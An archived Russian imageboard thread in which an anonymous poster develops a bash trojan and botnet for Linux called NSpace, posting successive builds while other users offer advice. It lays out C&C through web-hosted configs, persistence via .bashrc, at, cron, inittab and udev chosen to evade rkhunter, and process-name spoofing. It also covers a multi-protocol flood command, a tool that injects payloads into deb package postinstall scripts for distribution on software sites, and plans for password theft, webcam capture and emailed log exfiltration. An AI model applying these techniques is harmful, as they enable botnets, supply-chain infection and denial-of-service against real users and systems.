Сохранен F 505
https://2ch.hk/i/res/44025.html

NSpace

 Аноним Пнд 27 Май 2013 18:27:42  #1 №44025 
1369664862128.jpg

Недотроян для ОС Linux.
Выполняется на уровне пользователя, запускается пока только с запуском терминала.
Каждому боту можно выдать имя/группу, и выдавать личные/групповые команды.
Команды - закодированые в base64 bash-скрипты в принципе, можно и бинарный файл запустить.
Управление осуществляется через веб-сайты, на которые загружены нужные файлы подробнее в архиве.

Принимаются конструктивная критика, советы пожелания и т.д.
Раржпегрилейтед.

Loading...
sageАноним Пнд 27 Май 2013 18:58:51  #2 №44026 

>>44025
В баше можно писать просто "&>/dev/null" (а в shebang у тебя баш).
Ну и ты б хоть минимально маскировался, перезапускал себя с другим argv[0], что ли.

Аноним Пнд 27 Май 2013 20:26:28  #3 №44027 
1369671988882.jpg

>>44026
В смысле, &>/dev/null и общий, и вывод ошибок сливает?
Альзо, ты имеешь в виду - перезапускался с разым именем каждый раз, и имена использовать сист. процессов?
Спасибо, буду думать в этом направлении.Пока хочу сделать лёгкую маскировку файла - самоизменение имён незначимых переменных и функций.

sageАноним Пнд 27 Май 2013 20:35:40  #4 №44030 

>>44027
У тебя вопросы в стиле "а не в Каспийское ли море впадает Волга", я хз, они риторические же?

Аноним Пнд 27 Май 2013 20:36:32  #5 №44031 
1369672592603.jpg

>>44026
>>44027
Кстати, придумал, как можно хоть под баш шифроватся:
`oldpath=$PATH
PATH=./:$PATH
ln $0 bash
bash
PATH=$oldpath
rm -rf bash`
Всё это, в целях конспирации, происходит в рабочей директории скрипта.
ОП

Аноним Пнд 27 Май 2013 20:37:50  #6 №44032 

>>44030
Именно, вечно всё переспрашиваю.

Аноним Втр 28 Май 2013 03:46:03  #7 №44044 

>>44031
Хуйня.
>ldpath=$PATH
>PATH=./:$PATH
>ln $0 bash
>bash
Во-первых, ln $0 bash; ./bash
Во-вторых, на этой строке и застрянет, нужно ./bash &
Ну а вообще одобряю, как минимум в качестве инструмента познания баша.

Аноним Втр 28 Май 2013 14:34:10  #8 №44050 

>>44031
exec -a же
мимокр

Аноним Втр 28 Май 2013 20:36:39  #9 №44071 
1369758999898.jpg

>>44050
Спасибо, няша!

Аноним Втр 28 Май 2013 20:44:13  #10 №44074 
1369759453167.png

>>44050
Делаю что-то не так.Попробую по-другому.

Аноним Втр 28 Май 2013 21:29:36  #11 №44081 
1369762176286.jpg

>>44044
Я повторил - работает.Ты код полностью читал?Скрипт не завершается, а висит в бесконечном цикле а иначе, после его завершения в терминале, который запущен, будет выведено сообщение об удачном завершении.
У тебя ось какая?
На неделе постараюсь выложить обновлённую версию.

Аноним Втр 28 Май 2013 21:35:44  #12 №44082 
1369762544844.jpg

>>44081
>>44044
Застряло бы, но это в скрипте выполняется, а скрипт из башрц запускается как фоновый процесс, т.е. нужно будет только процесс nspace завершить, чтобы в списке процессов глаза не мозолил, и в самом конце bash удалить, чтобы поиском не брался.

Аноним Втр 28 Май 2013 22:21:24  #13 №44083 

>>44082
Вот-вот, вот и я о том же.
>>44081
>У тебя ось какая?
Debian GNU/Linux.

Аноним Срд 29 Май 2013 16:50:54  #14 №44118 
1369831854656.jpg

Хм.Если скрипт сам себя перезапускает, то в терминал всё равно выводится сообщение об удачном завершении фонового процеса [1]+ Done /home/tux/.config/libreoffice/nspace.
Получается, что лучше всего назвать скрипт bash'ем, и в .bashrc прописывать переход в рабочую папку, изменение $PATH, запуск фонового процесса и переход обратно в домашнюю папку.

Аноним Срд 29 Май 2013 17:28:15  #15 №44119 

>>44118
Лучше всего просто не запускать скрипт из терминала.
cron[tab] есть на любой убунте. Нужно проверять его наличие и при положительном результате пихать в кронтаб, при отрицательном — в .bashrc.

Аноним Срд 29 Май 2013 17:47:59  #16 №44122 

>>44119
Крон по дефолту вообще email рассылает.
Асло man at; man inittab; man xinit
мимокр

Аноним Срд 29 Май 2013 21:21:49  #17 №44132 

>>44122
>по дефолту вообще email рассылает
Только если скрипт что-то высрал в stdout/stderr.

Аноним Чтв 30 Май 2013 16:22:22  #18 №44150 
1369916542222.jpg

Сейчас пилю самозапуск через at.
Уже сделал изменение имён функций и основных переменных.
Оп

Аноним Птн 31 Май 2013 15:39:28  #19 №44222 
1370000368257.jpg

Сборка #2.
Добавил:
самозапуск через at
изменение имён функций и переменных
три режима скорости работы.

Аноним Суб 01 Июн 2013 09:43:28  #20 №44252 
1370065408957.jpg
Аноним Суб 01 Июн 2013 09:57:59  #21 №44253 
1370066279662.jpg

Теперь нужно сделать средство "обратной связи", чтобы бот мог, как минимум, куда-то слать свой лог.
Нашёл скрипт для отправки почты через консоль пикрилейтед.
На следующей неделе выложу обновлённую версию бота.

Аноним Суб 01 Июн 2013 12:59:21  #22 №44254 

>>44253
А потом ты перепишешь его на перле, добавишь управление через тор и эксплуатацию всех известных уязвимостей для получения рута, включая убунтовское судо без пароля :3
С интересом наблюдаю за тредом, из него может получиться хороший пример для wanna-be-линуксоидов в /s/.

Аноним Суб 01 Июн 2013 13:15:43  #23 №44255 

>>44253
Нахуй почту, используй irc, как все нормальные трояны. А если и не нахуй почту, мог бы ограничиться nc+openssl, скрипты ещё какие-то подтащил.

Аноним Суб 01 Июн 2013 13:50:15  #24 №44259 

>>44255
>nc+openssl
Не на каждом сервере есть, да и на десктопе тоже. Примерно столь же сомнительная затея, как и тащить собой левый скрипт.
Но если ориентироваться на бубунтят, то сойдёт.

Аноним Суб 01 Июн 2013 14:14:55  #25 №44262 
1370081695469.jpg

>>44254
>переписать на перле
Я на нём плохо пишу.Он же вроде как по дефолту далеко не в каждый дистрибутив входит, в отличии от баша.Какие ты профиты подразумеваешь?
>управление через тор
Веб-интерфейс, или что-то другое?
>эксплуатация уязвимостей
Я собираюсь сделать, чтобы конфиг-файлом задавались bash-код и внутренние команды бота, например установка дополнений с сервера.Почтовый скрипт я так заливать и собираюсь, эксплойты можно точно также заливать.

Аноним Суб 01 Июн 2013 14:28:54  #26 №44263 

Ведро лагает, пикчу не ту запостил.Пока на даче, буду отписываться без картинок.

Аноним Суб 01 Июн 2013 14:53:24  #27 №44264 

>>44255
>использовать irc
Ты имеешь в виду - только для отправки лога, или команды ботам ты тоже так хочешь раздавать?

Аноним Суб 01 Июн 2013 15:03:10  #28 №44266 

>>44262
>не в каждый дистрибутив входит, в отличии от баша.Какие ты профиты подразумеваешь?
Да никаких, это ирония.
>Веб-интерфейс, или что-то другое?
Откуда мне знать, что ты захочешь/сможешь? Про тор тоже была ирония.
>Почтовый скрипт я так заливать и собираюсь
Посмотри (ldd mailsend), какие у него библиотеки в зависимостях. Может оказаться, что они тоже не на каждой системе есть.
>>44264
Погугли управление ботнетом через IRC, это древнейший способ. Только вряд ли он нужен для бота на баше, лол.

Аноним Суб 01 Июн 2013 15:13:50  #29 №44267 

>>44259
openssl без nc тогда. Уж оно-то точно на каждом сервере найдётся.

Аноним Суб 01 Июн 2013 15:16:00  #30 №44268 

>>44264
Да для всего сразу.

Аноним Суб 01 Июн 2013 17:00:27  #31 №44271 

>>44268
В случае с IRC, команды получают только боты в онлайне. Если бот зайдет на канал через две минуты после отправки команды, он будет «не в теме». Число ботов и их IP можно определить, зайдя на IRC-канал. Защита канала паролем не поможет, потому что последний легко выковырять из кода бота.

Не вижу профита.Пока архитектура бота централизованая, проще использовать http - кто попало не узнает количество/айпи ботов, и не надо повторно отправлять команды каждые несколько минут - через тор конфиг-файл залил, и вуаля!
Для irc'а нужно, чтобы только хозяин управлял всеми, для этого нужно использовать открытые ключи.
Хотя если в будущем я буду делать бот децентрализованым, то да - как-то так я и сделаю.

Аноним Суб 01 Июн 2013 17:35:02  #32 №44274 

>>44271
Тор - всё-таки перебор, тяжёлый, тормозной, много с собой таскать говна и т.п. IRC - просто традиционный и очень распространённый канал. Сейчас, скорее, p2p всякие рулят, и вплоть до твитера-дропбокса, если кто хипстер дохуя.

Ну и, раз уж у нас тут ботоликбез, для персистентных команд ты можешь использовать заголовок канала и/или обычного irc-бота типа eggdrop, который будет всем всё ретранслировать. Асло RSA-подпись команд делается проще, чем кажется, тем же openssl.

Аноним Суб 01 Июн 2013 19:25:12  #33 №44281 

>>44274
>тор
Лол.Я имел в виду, заливать конфиг, сидя через тор, а не хостится на onion-сайтах.
>openssl
Знаю, что в каждой бубунте есть.Пока поразвиваю веб-ориентированую версию, хотя бы чтоб проработать плагины воровалки паролей/скриншоты/подмена html-файлов etc а там видно будет.

Аноним Суб 01 Июн 2013 19:35:01  #34 №44282 

>>44281
>воровалки паролей/скриншоты/подмена html-файлов
Тебе через какое время сказать название продукта, где это всё уже есть?

sageАноним Суб 01 Июн 2013 20:33:13  #35 №44286 

>>44282
Ебать, срыв покровов итете. Не мешай ребёнку задрачивать баш, такой-то дух исследования у него.

Аноним Суб 01 Июн 2013 21:22:43  #36 №44287 

>>44282
Можешь не говорить, мне и так норм.

Аноним Суб 01 Июн 2013 22:44:41  #37 №44288 

>>44282
Под линь? Паблик? Скажи.

Аноним Суб 01 Июн 2013 22:45:29  #38 №44289 

>>44288
lpr.sh

Аноним Суб 01 Июн 2013 22:52:39  #39 №44292 

>>44289
Что-то совсем не то гуглится.

Аноним Вск 02 Июн 2013 00:15:04  #40 №44293 

>>44253

Кто только в здравом уме будет скачивать, выставлять права и запускать твой бот?

Аноним Вск 02 Июн 2013 00:16:44  #41 №44294 

>>44293

Алсо на сервере уж нет проблем найти странный форк процесса висящий

Аноним Вск 02 Июн 2013 00:24:22  #42 №44295 

>>44286
Так я и без подъёба спрашиваю. Просто настанет момент, когда он уже задрочит баш, но скрипт ещё не будет допилен до идеального состояния по содержимому.
>>44287
Скажу, ниже просят.
>>44288
Я имел в виду metasploit. Он на ruby, но оттуда можно почерпнуть идеи по поводу «воровалок паролей/скриншов/подмены html-файлов». Да и кое-что на баше там тоже есть.
>>44294


#!/usr/bin/perl
$0="/usr/sbin/apache2 -k start"
evil_code();

Ну ты понел. Ты слишком хорошо думаешь о быдлоадминах серверов, которые можно взломать. Большинство даже про ssh key auth не знают.
Аноним Вск 02 Июн 2013 00:30:16  #43 №44296 

>>44295
>Большинство даже про ssh key auth не знают
ну просто я сам админ

Аноним Вск 02 Июн 2013 00:43:05  #44 №44297 

>>44293
Ох блять, ещё один. Про УЯЗВИМОСТИ слыхал? Или ты думаешь, что в 2013 малварь до сих пор распространяются как "бедный албанский вирус"?

Аноним Вск 02 Июн 2013 00:46:58  #45 №44298 

>>44297

Ну ладно, ладно, хацкер доморощенный, лабай дальше на баше боты свои, лол.

Аноним Вск 02 Июн 2013 00:50:07  #46 №44299 

>>44262
Ну ты если хуцкер профессианальный, тебя сюда вообще зачем занесло? Надеешься приватов зиродеев накопать на борде, или что?

Аноним Вск 02 Июн 2013 00:52:53  #47 №44300 

>>44299>>44298

Аноним Вск 02 Июн 2013 00:54:18  #48 №44301 

>>44299

Но я >>44298 же не он, я просто усомнился в способах доставки этой хуйни. А если есть рут доступ к серверу - зачем заморачиваться с башем если можно на месте что хочешь собрать.

Аноним Вск 02 Июн 2013 00:59:30  #49 №44302 

>>44301
Так интересно же на баше сделать. Как и на cmd, тащемта - самые тривиальные вещи типа переписать argv[0] решаются адски черезжопно. На перле-пхп-то такого говна и писать не надо, на honeypot можно наковырять десяток-другой за день.

Аноним Вск 02 Июн 2013 01:01:54  #50 №44303 

>>44302

Кстати тебе одну вещь скажу, только ты не обижайся - из-под обычного юзверя ты не сможешь всякие штуки вытворять с tcp траффиком, да и вообще скорее всего не сможешь канал толком забить.

Аноним Вск 02 Июн 2013 01:07:30  #51 №44304 

>>44303
Я не автор, но его усилия одобряю. Кстати, забить канал без рута примерно так же несложно, как с рутом, но это, кажется, не основная функция личинки.

Аноним Вск 02 Июн 2013 01:10:25  #52 №44305 

>>44304

Ну да, усилия это хорошо.

Аноним Вск 02 Июн 2013 02:23:57  #53 №44308 

>>44303
>из-под обычного юзверя ты не сможешь всякие штуки вытворять с tcp траффиком
Повышение привилегий сплойтом, очевидно же.

Аноним Вск 02 Июн 2013 09:37:15  #54 №44311 

>>44293
Я предполагаю, что основной способ заражения - прятать его в deb/rpm пакетах можно даже скрипт для этого попробывать написать и выкладывать на сайтах с софтом для линукс.
>>44295
Те скрипты - базовые возможности, что бы бот умел хоть что-то.При желании установить что-нибуть другое в третьей версии труда не составит.Алсо, раз уж такое дело - можешь скриптов для трояна понаделывать, я не против дополнительного набора модов для бота, лол.
>>44299
>хакер професиональный
Нет, с чего ты взял?
>>44303
Знаю.Но я в бота уже прописал, что если он запускается от рута, то прописывается он в автозагрузку на уровне ОС надо будет больше файлов автозагрузочных прописать, пока только один и, соответственно, можно сделать модов и для рута.Кстати, deb/rpm пакеты от рута ставятся, что для нас очень хорошо.

Аноним Пнд 03 Июн 2013 00:48:39  #55 №44332 

>>44311
>прятать его в deb/rpm пакетах и выкладывать на сайтах с софтом для линукс
Может взлететь. Особенно если куда-нибудь в postinstall впихнуть.

Аноним Втр 04 Июн 2013 08:09:18  #56 №44380 
1370318958174.gif

Сделал установку/запуск модов, собираюсь оптимизировать самозагрузку.Как думаете - от рута тоже at пользоваться, или просто автозагрузка через системные файлы + работа в фоновом режиме?

Аноним Втр 04 Июн 2013 12:19:41  #57 №44383 

>>44380
От рута лучше проявить фантазию, в inittab, там, засунуться, или вообще в udev. В эти места в последнюю очередь смотрят, да и всякие rkhunter-ы туда не лазят.

Аноним Втр 04 Июн 2013 12:27:56  #58 №44384 

>>44380
Кстати, gzip к base64 добавить было бы, ну, канонично. Почему-то считается, что вредоносное ПО должно быть маленьким.

Аноним Втр 04 Июн 2013 14:36:18  #59 №44386 
1370342178604.jpg

>>44384
Bzip2 же лучше сжимает, не?

Аноним Втр 04 Июн 2013 15:38:33  #60 №44389 
1370345913472.jpg

>>44386
Хотя им сложнее запаковывать поток ввода, и работает дольше.

Аноним Втр 04 Июн 2013 16:16:15  #61 №44390 

>>44389
Не везде по дефолту стоит, а так-то да. Не сложнее уж точно.

Аноним Втр 04 Июн 2013 17:53:35  #62 №44395 

>>44384
>Почему-то считается, что вредоносное ПО должно быть маленьким.
Потому что считается, что хорошее вредоносное ПО пишут настоящие хакеры (в изначальном смысле слова), как спорт, схожий с написанием демок, где размер имеет значение. Это сейчас эта область превратилась в сплошной коммерс, копипиздинг и засилье школоты с батниками. Ну и такой легче криптовать, легче запускать в виде пейлоада (в условиях ограниченного места), легче инжектить и т.п.

Аноним Втр 04 Июн 2013 18:03:38  #63 №44396 

>>44395
Анон-капитан, это была, типа, ирония. Ну, и зиповать всё равно полезно.
Без монетизации этот спорт сдох бы сам по себе, вирусы остались бы на дискетах и raspberry.

Аноним Срд 05 Июн 2013 01:08:42  #64 №44399 
1370380122386.jpg

>>44025
man bash

Аноним Срд 05 Июн 2013 01:27:16  #65 №44400 
1370381236629.jpg


[email protected] ~ $ cd 1369664862128/
[email protected] 1369664862128 $ ./nspace
./nspace: строка 25: conky: symbol __pthread_atfork, version LIBAST_2.0 not defined in file libastral.so.0 with link time reference
[email protected] 1369664862128 $


Оп, что за хуйня? Не работает твой троян!
Аноним Срд 05 Июн 2013 02:36:30  #66 №44402 

>>44400
>conky
>libastral.so.0
Техническая шутка!.jpg

Аноним Срд 05 Июн 2013 17:35:40  #67 №44409 
1370439340010.jpg

Скоро выложу новую версию, осталось допилить только почтовый скрипт который, кстати, как раз через openssl работает.

Аноним Чтв 06 Июн 2013 16:03:02  #68 №44555 
1370520182987.jpg

Сборка #3.
Добавил:
Установа от рута
Устанока модов для бота
Отправка лога почтой

+скрипт для генерации конфиг-файла

Аноним Птн 07 Июн 2013 14:53:36  #69 №44642 
1370602416597.jpg
Аноним Птн 07 Июн 2013 15:10:51  #70 №44643 
1370603451815.png

Делаю внутреннюю команду самоуничтожения.Вы допустим будете какой каталог для установки бота указывать - новый, или каталог какой-то программы?

Просто если новый - достаточно удалить папку, а если существующий - удалить бота, лог и все моды, и тогда имена модов нужно будет сохранять, чтобы не трогать другие файлы.

Аноним Птн 07 Июн 2013 16:48:55  #71 №44649 

>>44643
Я обычно шифрую всё куда нибудь в /var/log/(nginx,apache,...)
>достаточно удалить папку
Не, так делать точно не надо. Делай лучше сразу по уму, чтобы потом не переделывать.

Аноним Суб 08 Июн 2013 23:41:03  #72 №44705 
1370720463147.jpg
Аноним Вск 09 Июн 2013 18:26:05  #73 №44739 
1370787965395.jpg

Сборка #4.
Добавил:

Команды: обновление, самоуничтожение, изменение имени/группы бота, удаление модов.
Изменил структуру конфиг-файлов: теперь одним конфигом можно задавать действия для разных ботов/групп.Произведена соответствующая модификация скрипта-генератора конфигов.
Пофиксил баг с выдаванием имени и группы боту при установке.

Единственный стандартный мод - всё тот же кривоватый deface.txt

Аноним Пнд 10 Июн 2013 21:18:19  #74 №44857 
1370884699300.jpg

Есть возможность отправлять лог аттачем, или же наоборот - оформить лог в html.
Есть какие советы/предложения?

Аноним Пнд 10 Июн 2013 21:18:57  #75 №44858 
1370884737964.jpg
Аноним Пнд 10 Июн 2013 21:20:17  #76 №44859 
1370884817314.jpg
Аноним Пнд 10 Июн 2013 21:48:06  #77 №44868 
1370886486917.gif

>>44857
а мне нравится.

Аноним Втр 11 Июн 2013 07:57:27  #78 №44961 
1370923047040.jpg

>>44868
Кукла?

Аноним Втр 11 Июн 2013 08:53:14  #79 №44962 

>>44961
Троянская кукла, ок.

Аноним Срд 12 Июн 2013 07:50:09  #80 №45031 
1371009009881.jpg
Аноним Чтв 13 Июн 2013 07:37:39  #81 №45109 
1371094659311.jpg

Впрочем, никто мне не мешает конфетку сьесть@на хуй сесть.
Буду отправлять лог аттачем и в html-табличке.

Аноним Птн 14 Июн 2013 10:53:44  #82 №45124 
1371192824221.jpg
Аноним Птн 14 Июн 2013 11:17:04  #83 №45125 
1371194224115.jpg

Новую сборку выложу на следующей неделе.
Хочу сделать flood и еще кое-что.
Псевдоустройства /dev/tcp и /dev/udp многими сборками bash поддерживаются же?

Аноним Птн 14 Июн 2013 13:36:17  #84 №45126 

>>45125
Многими. Делай уж сразу dns amplification, если такой злой. А то твой вирус выйдет в топ.

Аноним Суб 15 Июн 2013 09:40:28  #85 №45153 
1371274828988.jpg
Аноним Вск 16 Июн 2013 09:52:40  #86 №45180 
1371361960160.jpg
Аноним Пнд 17 Июн 2013 16:06:51  #87 №45200 
1371470811122.jpg

Сборка #5.
Добавил:
Команды:
flood - флудит по http, tcp/udp мусором, и icmp.
+Простенькая быдлоадминка на php для генерации конфиг-файлов.

>dns amplification
Пока что нет.

Аноним Пнд 17 Июн 2013 16:40:29  #88 №45201 

>>45125
>Псевдоустройства /dev/tcp и /dev/udp многими сборками bash поддерживаются же?
ШТО? Ты бы хоть погуглил поверхностно перед тем, как спрашивать. /dev/ вообще никакого отношения к bash не имеет.
Как минимум в изкоробочном дебиане упомянутых устройств нет.

Аноним Пнд 17 Июн 2013 17:31:42  #89 №45205 

>>45201
Про нод-устройства я знаю, но не так выразился.
/dev/tcp и /dev/udp - их НЕТ как файлов/папок/etc, но если ты в баше будешь записывать что-то, например в /dev/tcp/2ch.hk/80 , то баш установит соединение и будет отправлять данные.
echo test >> /dev/tcp/2ch.hk/80 - если не напишет, что файла нет, значит работает.
Как-то так.

Аноним Пнд 17 Июн 2013 17:33:13  #90 №45206 

>>45201
Вот это ты жиденько обосрался.

Аноним Пнд 17 Июн 2013 17:59:28  #91 №45207 

>>45206
И правда, обосрался. Почему-то был уверен, что /dev/tcp создаётся ядром/udev'ом и был убран, как пережиток прошлого.
>>45205
Пардон. Проверил на дебиане, bash поддерживает, dash не поддерживает.
Если собираешься этим пользоваться, проверяй, где именно ты исполняешься — /bin/bash вполне может оказаться ссылкой на /bin/dash.

Аноним Пнд 17 Июн 2013 19:35:32  #92 №45208 
1371483332092.jpg

Блджад.Так выглядит лог, отправляемый по почте в сборке 5.

Аноним Пнд 17 Июн 2013 19:36:29  #93 №45209 
1371483389570.jpg

>>45208
Пофиксил, жаль так обосрался.

Аноним Втр 18 Июн 2013 10:38:42  #94 №45235 
1371537522415.jpg

Стоит ли продолжить интеграцию куколки и веб-скриптов?

Аноним Срд 19 Июн 2013 10:58:40  #95 №45253 
1371625120263.png

>>45235
Бамп вопросу.Нужны ли дополнительные функции для админки, регистрация ботов в общей базе и т. д.?

Аноним Срд 19 Июн 2013 15:49:53  #96 №45260 

>>45253
Лучше дроппер какой-нибудь. А то личинка-то годная, а как её впендюрить - неочевидно.

Аноним Срд 19 Июн 2013 18:20:07  #97 №45261 
1371651607127.jpg

>>45260
Как насчёт инъектора deb-пакетов?

Аноним Срд 19 Июн 2013 19:34:41  #98 №45262 

А в чем профиты для тебя?

Аноним Срд 19 Июн 2013 21:37:03  #99 №45264 
1371663423682.jpg

>>45262
1. Практика в скриптошкольничестве.
2. Лулзы.
3. Небольшой плюс к ЧСВ.
4. Потом и сам буду успользовать же, а пока буду внимать советам анонов@разрабатывать.

Аноним Срд 19 Июн 2013 22:09:41  #100 №45265 

>>45261
Отличная идея. Чтобы ты знал, куда гуглить — dpkg-deb.
Если postinstall отсутствует, его можно смело добавить и собрать пакет обратно.
Если присутствует, добавить в конец и вывести юзеру (нам, в смысле) в текстовый редактор на одобрение/редактирование.

Аноним Чтв 20 Июн 2013 10:58:06  #101 №45274 
1371711486957.jpg

>>45265
Начал клепать скрипт.Он будет расчитан на работу не только в системах с dpkg.
Сделаю, что бы он мог, если запускать без аргументов, заражать все deb-пакеты, которые найдёт в системе - тогда его можно будет использовать в качестве мода.

Аноним Чтв 20 Июн 2013 13:15:21  #102 №45275 

>>45274
Подожди, но в системе обычно лежат уже установленные пакеты (/var/cache/apt), есть ли смысл их заражать?

Аноним Чтв 20 Июн 2013 14:29:46  #103 №45279 

>>45275
Мне тоже кажется, что смысла нет. Они же из системы никуда не выходят, да и используются только если (дана команда переустановить пакет) + (в репах нет более новой версии).
Смысл будет только если личинка попадёт на зеркало какой-нибудь репы, лол.

Аноним Чтв 20 Июн 2013 17:21:02  #104 №45292 

>>45275
>>45279
http://rghost.net/46894006 - тестовая версия скрипта.
./deb-injector --prepare script.sh - сохраняет скрипт, которым нужно заражать, в себе.
./deb-injector 1.deb 2.deb n.deb - заражает указанные пакеты.
./deb-injector - ищет все deb-паеты в системе и пытается их заразить.

Аноним Чтв 20 Июн 2013 17:21:40  #105 №45293 

>>45292
>пакеты
Фикус.

Аноним Чтв 20 Июн 2013 21:19:14  #106 №45301 

>>45292
>exho
Апичатка.

Аноним Птн 21 Июн 2013 07:50:32  #107 №45338 

>>45301
Пофиксил.

Аноним Птн 21 Июн 2013 15:13:38  #108 №45366 
1371813218241.jpg

Сборка #6.
Добавил:
Команды:
получение информации о системе
добавление/удаление серверов для ботов
запуск файла, который может находиться по произвольной ссылке

В админке теперь можно загружать скрипты для выполнения ботами и давать задания разным ботам/группам в одном конфиге.

произвольные скрипты для ботов теперь будут сохраняться в /tmp
+теперь при удалении бота будут чиститься системные файлы

Аноним Суб 22 Июн 2013 08:40:11  #109 №45389 
1371876011222.jpg
Аноним Вск 23 Июн 2013 09:52:13  #110 №45451 
1371966733307.jpg
Аноним Пнд 24 Июн 2013 09:28:24  #111 №45517 
1372051704154.jpg
Аноним Пнд 24 Июн 2013 09:32:19  #112 №45518 

>>44222
>222
>>44555
>555
>>45200
>00
>>45366
>66
Лол.

Аноним Пнд 24 Июн 2013 20:36:53  #113 №45555 
1372091813732.jpg

Что вы хотели бы увидеть в будущих версиях?В седьмой сборке толком ничего нового не будет, оптимизирую выполнение внутренних команд.

Аноним Втр 25 Июн 2013 21:08:51  #114 №45595 
1372180131616.png
Аноним Срд 26 Июн 2013 13:38:44  #115 №45603 
1372239524362.jpg

>>45555
Бамп вопросу!

Аноним Чтв 27 Июн 2013 10:14:31  #116 №45614 
1372313671392.jpg

Сборка #7.
Добавил:

Команда change-synctime - меняет период синхронизации с сервером.
Командой flood можно флудить многопоточно по icmp и tcp/udp.
Теперь внутренние команды выполняются самим скриптом.
Режим normal - обычный, а в режиме hide бот выполняет только приказы именно для его связки имя/группа.

Аноним Птн 28 Июн 2013 20:23:13  #117 №45633 

Быдлокода стало меньше.

Аноним Птн 28 Июн 2013 21:14:02  #118 №45637 
1372439642455.jpg

>>45633
И то хорошо, лол.

Я вижу пока два пути развития:
1. YOBA-технологии: интеграция с админкой, общая база ботов, красиво оформленая статистика и т.д.Недостаток - сложность синхронизации серверов, ну и ненадёжность C&C-архитектуры.
2. Частичная децентрализация - к серверам боты подключается, чтобы взять список айпи своих собратьев, а дальше - общаются между собой.Задания боты будут рассылать, только если цифровая подпись валидная.Можно будет почитать насчёт автоматической регистрации доменов, ну или еще подумать - как бы автоматизировать получение списков.
Какие мысли по этому поводу?

Аноним Суб 29 Июн 2013 21:32:46  #119 №45667 
1372527166386.jpg
Аноним Вск 30 Июн 2013 22:55:12  #120 №45698 
1372618512458.jpg
Аноним Пнд 01 Июл 2013 00:46:47  #121 №45702 

>>45637
>Частичная децентрализация
Делай обязательно. Хотя бы в качестве упражнения на построение p2p-сети.
Впрочем, здесь всё в качестве упражнения, что есть неплохо.

Аноним Пнд 01 Июл 2013 04:17:13  #122 №45706 

Няша продолжай над этим работать, это охуенно. Ты молодец!

Аноним Пнд 01 Июл 2013 13:30:14  #123 №45709 

Насчёт новых функций, он может исполнять код от рута? К примеру там, скачай такой-то вирус и установи прописав в автозагрузку?
Алсо можно запилить функцию скриншота/фоточки с бебкамеры.

Аноним Пнд 01 Июл 2013 13:32:11  #124 №45710 

как сломать репу каноникал? там много пякетов всяких, можно скриптом позаражать, заебис будет.

Аноним Пнд 01 Июл 2013 14:10:34  #125 №45711 

>>45709
>скачай такой-то вирус
>автозагрузку
>unix-like
Лол.
>>45710
Анус себе сломай, пёс.

Аноним Пнд 01 Июл 2013 15:58:12  #126 №45714 
1372679892574.jpg

config.php содержит логин пасс админки, если его тупой хомяж скачает то всё пиздец, или не?

Аноним Пнд 01 Июл 2013 16:05:04  #127 №45715 

>>45714
Нет, это же php.
Если на веб-сервере с поддержкой php есть *.php-файлы, то он не выводит их содержимое, а выполняет их.Если кто-то перейдёт с браузера на config.php, то выведено ничего не будет, ибо в нём только определение переменных.

Аноним Пнд 01 Июл 2013 16:14:15  #128 №45716 

>>45709
>вирус
>автозагрузка
>unix-like
Охлол.Можно при выдаче задания боту загрузить скрипт или программу, и они будут выполнены.Но раз ты так задаешь вопрос, то ты вряд ли сможешь найти/написать что-либо нужное тебе
>фотки с вебки
Мод такой несложно сделать, используя стандартные консольные проги, в будущем думаю будет.

Аноним Пнд 01 Июл 2013 16:17:33  #129 №45717 

>>45715
а если сделать вгет хттп://сайт/цонфиг.пхп?
Пустой файл скачаеться?

Аноним Пнд 01 Июл 2013 16:20:01  #130 №45718 

>>45716
Ну дело в том что я очень мало знаком с системами на линуксе, надо-бы полуркать немного.
Всмысле я не знаю допустим где лежат конфиги, бинарники и так далее.
Грубо говоря я не знаю как устроена хранение файлов, инсталляция приложений и так далее.

Аноним Пнд 01 Июл 2013 16:57:23  #131 №45719 

>>45717
Именно.
>>45718
Это видно.Автозагрузку сделать посложнее, чем в винде, но можно.А вирусов под линукс очень мало.Луркай.

Аноним Пнд 01 Июл 2013 17:11:11  #132 №45720 

>>45719
Это видно.Автозагрузку сделать посложнее, чем в винде, но можно.А вирусов под линукс очень мало.Луркай.

Если НПространство работает от рута, сделать автозагрузку не должно быть проблематично. В том то и дело что вирусов нет, это-же охуенно, никто не ставит ав, никто его даже и искать не будет. По-моему вирусы на лнупсы самое то, он сейчас с бубунтой набирает обороты, школо-хомячки вбивают в консоль любую команду дабы установить :програмнаме: и даже не подозревают что вместе со скайпиком или хромом устанавливают страшный вирус, бедь вирусов на линуксах нет!

Аноним Пнд 01 Июл 2013 17:12:49  #133 №45721 
1372684369362.jpg


буду бампать тред понями, потому-что мне нехуй делать.

Аноним Пнд 01 Июл 2013 17:13:23  #134 №45722 
1372684403991.jpg

>>45721

Аноним Пнд 01 Июл 2013 17:15:22  #135 №45723 
1372684522234.png

>>45722

Аноним Пнд 01 Июл 2013 17:17:45  #136 №45724 
1372684665105.png

>>45723

Аноним Пнд 01 Июл 2013 17:21:40  #137 №45725 
1372684900324.jpg
Аноним Пнд 01 Июл 2013 17:22:49  #138 №45726 
1372684969686.jpg
Аноним Пнд 01 Июл 2013 17:33:29  #139 №45727 

>>45720
Ну да, почитай код.
Можно через /dev/inittab, через /dev/init.d/rc.local, или, к примеру, через планировщики.
Сейчас в GNU/Linux есть много пространства для творчества, самое время начинать веселье.

Аноним Пнд 01 Июл 2013 17:45:38  #140 №45728 

>>45721
>>45722
>>45723
>>45724
>>45725
>>45726
У меня скоро начнётся ПЕРЕДОЗИРОВКА ДРУЖБОМАГИИ от такой скорости в /i/.
Я и то слежу, чтоб был минимум один пост в день, и тред кажется и не покидал нулевую.
А вообще - спасибо!

Аноним Пнд 01 Июл 2013 17:48:20  #141 №45729 
1372686500279.jpg

>>45728
Отклеилась.

Аноним Пнд 01 Июл 2013 17:59:46  #142 №45731 

>>45728
Пожалуйста. :3

Аноним Пнд 01 Июл 2013 18:01:10  #143 №45732 

>>45727
>Сейчас в GNU/Linux есть много пространства для творчества, самое время начинать веселье.
Вот и я к тому-же.

Аноним Пнд 01 Июл 2013 19:51:21  #144 №45735 
1372693881417.jpg
Аноним Пнд 01 Июл 2013 19:55:31  #145 №45736 
1372694131523.jpg
Аноним Пнд 01 Июл 2013 19:59:39  #146 №45737 
1372694379049.jpg
Аноним Пнд 01 Июл 2013 20:07:20  #147 №45738 
1372694840116.jpg
Аноним Пнд 01 Июл 2013 20:30:10  #148 №45739 
1372696210188.png
Аноним Втр 02 Июл 2013 16:26:22  #149 №45758 

PORA BAMPAT TRED TRED SAM NE ZABAMPITSA

